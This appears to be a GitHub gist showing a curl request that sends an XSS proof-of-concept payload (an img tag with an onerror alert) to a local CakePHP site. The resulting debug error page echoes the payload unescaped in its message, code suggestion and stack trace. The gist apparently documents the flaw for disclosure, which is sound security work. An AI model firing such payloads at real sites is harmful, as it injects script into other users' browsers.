Created
November 4, 2013 22:23
-
-
Save markstory/7310226 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ curl -k "https://cake.localhost.com/tasks/aaa%27;%3Cimg%20src=%27a%27%20onerror=%27alert%28%22XSS%22%29%27/" | |
| <!DOCTYPE html> | |
| <html> | |
| <head> | |
| <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title> | |
| CakePHP: the rapid development php framework: | |
| Errors </title> | |
| <link href="/favicon.ico" type="image/x-icon" rel="icon" /><link href="/favicon.ico" type="image/x-icon" rel="shortcut icon" /><link rel="stylesheet" type="text/css" href="/css/cake.generic.css" /></head> | |
| <body> | |
| <div id="container"> | |
| <div id="header"> | |
| <h1><a href="http://cakephp.org">CakePHP: the rapid development php framework</a></h1> | |
| </div> | |
| <div id="content"> | |
| <h2>Missing Method in TasksController</h2> <p class="error"> | |
| <strong>Error: </strong> | |
| The action <em>aaa';<img src='a' onerror='alert("XSS")'</em> is not defined in controller <em>TasksController</em></p> | |
| <p class="error"> | |
| <strong>Error: </strong> | |
| Create <em>TasksController::</em><em>aaa';<img src='a' onerror='alert("XSS")'()</em> in file: app/Controller/TasksController.php.</p> | |
| <pre> | |
| <?php | |
| class TasksController extends AppController { | |
| <strong> | |
| public function aaa';<img src='a' onerror='alert("XSS")'() { | |
| } | |
| </strong> | |
| } | |
| </pre> | |
| <p class="notice"> | |
| <strong>Notice: </strong> | |
| If you want to customize this error message, create app/View/Errors/missing_action.ctp</p> | |
| <h3>Stack Trace</h3> | |
| <ul class="cake-stack-trace"> | |
| <li><a href="#" onclick="traceToggle(event, 'file-excerpt-0')">CORE/Cake/Routing/Dispatcher.php line 187</a> → <a href="#" onclick="traceToggle(event, 'trace-args-0')">Controller->invokeAction(CakeRequest)</a> <div id="file-excerpt-0" class="cake-code-dump" style="display:none;"><pre><code><span style="color: #000000"><span style="color: #0000BB"> $controller</span><span style="color: #007700">-></span><span style="color: #0000BB">startupProcess</span><span style="color: #007700">();</span></span></code> | |
| <code><span style="color: #000000"><span style="color: #0000BB"></span></span></code> | |
| <code><span style="color: #000000"><span style="color: #0000BB"> $render </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span></span></code> | |
| <span class="code-highlight"><code><span style="color: #000000"><span style="color: #0000BB"> $result </span><span style="color: #007700">= </span><span style="color: #0000BB">$controller</span><span style="color: #007700">-></span><span style="color: #0000BB">invokeAction</span><span style="color: #007700">(</span><span style="color: #0000BB">$request</span><span style="color: #007700">);</span></span></code></span> | |
| <code><span style="color: #000000"><span style="color: #0000BB"> </span><span style="color: #007700">if (</span><span style="color: #0000BB">$result </span><span style="color: #007700">instanceof </span><span style="color: #0000BB">CakeResponse</span><span style="color: #007700">) {</span></span></code></pre></div> <div id="trace-args-0" class="cake-code-dump" style="display: none;"><pre>object(CakeRequest) { | |
| params => array( | |
| [maximum depth reached] | |
| ) | |
| data => array([maximum depth reached]) | |
| query => array([maximum depth reached]) | |
| url => 'tasks/aaa%27;%3Cimg%20src=%27a%27%20onerror=%27alert%28%22XSS%22%29%27/' | |
| base => '' | |
| webroot => '/' | |
| here => '/tasks/aaa%27;%3Cimg%20src=%27a%27%20onerror=%27alert%28%22XSS%22%29%27/' | |
| [protected] _detectors => array( | |
| [maximum depth reached] | |
| ) | |
| [protected] _input => '' | |
| }</pre></div></li> | |
| <li><a href="#" onclick="traceToggle(event, 'file-excerpt-1')">CORE/Cake/Routing/Dispatcher.php line 162</a> → <a href="#" onclick="traceToggle(event, 'trace-args-1')">Dispatcher->_invoke(TasksController, CakeRequest, CakeResponse)</a> <div id="file-excerpt-1" class="cake-code-dump" style="display:none;"><pre><code><span style="color: #000000"><span style="color: #0000BB"> </span><span style="color: #007700">));</span></span></code> | |
| <code><span style="color: #000000"><span style="color: #0000BB"> </span><span style="color: #007700">}</span></span></code> | |
| <code><span style="color: #000000"><span style="color: #0000BB"></span></span></code> | |
| <span class="code-highlight"><code><span style="color: #000000"><span style="color: #0000BB"> $response </span><span style="color: #007700">= </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">_invoke</span><span style="color: #007700">(</span><span style="color: #0000BB">$controller</span><span style="color: #007700">, </span><span style="color: #0000BB">$request</span><span style="color: #007700">, </span><span style="color: #0000BB">$response</span><span style="color: #007700">);</span></span></code></span> | |
| <code><span style="color: #000000"><span style="color: #0000BB"> </span><span style="color: #007700">if (isset(</span><span style="color: #0000BB">$request</span><span style="color: #007700">-></span><span style="color: #0000BB">params</span><span style="color: #007700">[</span><span style="color: #DD0000">'return'</span><span style="color: #007700">])) {</span></span></code></pre></div> <div id="trace-args-1" class="cake-code-dump" style="display: none;"><pre>object(TasksController) { | |
| uses => array([maximum depth reached]) | |
| name => 'Tasks' | |
| helpers => array([maximum depth reached]) | |
| request => object(CakeRequest) {} | |
| response => object(CakeResponse) {} | |
| viewPath => 'Tasks' | |
| layoutPath => null | |
| viewVars => array([maximum depth reached]) | |
| view => 'aaa';<img src='a' onerror='alert("XSS")'' | |
| layout => 'default' | |
| autoRender => true | |
| autoLayout => true | |
| Components => object(ComponentCollection) {} | |
| components => array( | |
| [maximum depth reached] | |
| ) | |
| viewClass => 'View' | |
| View => null | |
| ext => '.ctp' | |
| plugin => null | |
| cacheAction => false | |
| passedArgs => array([maximum depth reached]) | |
| scaffold => false | |
| methods => array( | |
| [maximum depth reached] | |
| ) | |
| modelClass => 'Task' | |
| modelKey => 'task' | |
| validationErrors => null | |
| Session => object(SessionComponent) {} | |
| [protected] _responseClass => 'CakeResponse' | |
| [protected] _mergeParent => 'AppController' | |
| [protected] _eventManager => object(CakeEventManager) {} | |
| } | |
| object(CakeRequest) { | |
| params => array( | |
| [maximum depth reached] | |
| ) | |
| data => array([maximum depth reached]) | |
| query => array([maximum depth reached]) | |
| url => 'tasks/aaa%27;%3Cimg%20src=%27a%27%20onerror=%27alert%28%22XSS%22%29%27/' | |
| base => '' | |
| webroot => '/' | |
| here => '/tasks/aaa%27;%3Cimg%20src=%27a%27%20onerror=%27alert%28%22XSS%22%29%27/' | |
| [protected] _detectors => array( | |
| [maximum depth reached] | |
| ) | |
| [protected] _input => '' | |
| } | |
| object(CakeResponse) { | |
| [protected] _statusCodes => array( | |
| [maximum depth reached] | |
| ) | |
| [protected] _mimeTypes => array( | |
| [maximum depth reached] | |
| ) | |
| [protected] _protocol => 'HTTP/1.1' | |
| [protected] _status => (int) 200 | |
| [protected] _contentType => 'text/html' | |
| [protected] _headers => array([maximum depth reached]) | |
| [protected] _body => null | |
| [protected] _file => null | |
| [protected] _fileRange => null | |
| [protected] _charset => 'UTF-8' | |
| [protected] _cacheDirectives => array([maximum depth reached]) | |
| [protected] _cookies => array([maximum depth reached]) | |
| }</pre></div></li> | |
| <li><a href="#" onclick="traceToggle(event, 'file-excerpt-2')">APP/webroot/index.php line 110</a> → <a href="#" onclick="traceToggle(event, 'trace-args-2')">Dispatcher->dispatch(CakeRequest, CakeResponse)</a> <div id="file-excerpt-2" class="cake-code-dump" style="display:none;"><pre><code><span style="color: #000000"><span style="color: #0000BB">$Dispatcher</span><span style="color: #007700">-></span><span style="color: #0000BB">dispatch</span><span style="color: #007700">(</span></span></code> | |
| <code><span style="color: #000000"><span style="color: #0000BB"> </span><span style="color: #007700">new </span><span style="color: #0000BB">CakeRequest</span><span style="color: #007700">(),</span></span></code> | |
| <code><span style="color: #000000"><span style="color: #0000BB"> </span><span style="color: #007700">new </span><span style="color: #0000BB">CakeResponse</span><span style="color: #007700">()</span></span></code> | |
| <span class="code-highlight"><code><span style="color: #000000"><span style="color: #0000BB"></span><span style="color: #007700">);</span></span></code></span> | |
| <code><span style="color: #000000"><span style="color: #0000BB"></span></span></code></pre></div> <div id="trace-args-2" class="cake-code-dump" style="display: none;"><pre>object(CakeRequest) { | |
| params => array( | |
| [maximum depth reached] | |
| ) | |
| data => array([maximum depth reached]) | |
| query => array([maximum depth reached]) | |
| url => 'tasks/aaa%27;%3Cimg%20src=%27a%27%20onerror=%27alert%28%22XSS%22%29%27/' | |
| base => '' | |
| webroot => '/' | |
| here => '/tasks/aaa%27;%3Cimg%20src=%27a%27%20onerror=%27alert%28%22XSS%22%29%27/' | |
| [protected] _detectors => array( | |
| [maximum depth reached] | |
| ) | |
| [protected] _input => '' | |
| } | |
| object(CakeResponse) { | |
| [protected] _statusCodes => array( | |
| [maximum depth reached] | |
| ) | |
| [protected] _mimeTypes => array( | |
| [maximum depth reached] | |
| ) | |
| [protected] _protocol => 'HTTP/1.1' | |
| [protected] _status => (int) 200 | |
| [protected] _contentType => 'text/html' | |
| [protected] _headers => array([maximum depth reached]) | |
| [protected] _body => null | |
| [protected] _file => null | |
| [protected] _fileRange => null | |
| [protected] _charset => 'UTF-8' | |
| [protected] _cacheDirectives => array([maximum depth reached]) | |
| [protected] _cookies => array([maximum depth reached]) | |
| }</pre></div></li> | |
| </ul> | |
| <script type="text/javascript"> | |
| function traceToggle(event, id) { | |
| var el = document.getElementById(id); | |
| el.style.display = (el.style.display === 'block') ? 'none' : 'block'; | |
| event.preventDefault(); | |
| return false; | |
| } | |
| </script> | |
| </div> | |
| <div id="footer"> | |
| <a href="http://www.cakephp.org/" target="_blank"><img src="/img/cake.power.gif" alt="CakePHP: the rapid development php framework" border="0" /></a> </div> | |
| </div> | |
| </body> | |
| </html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment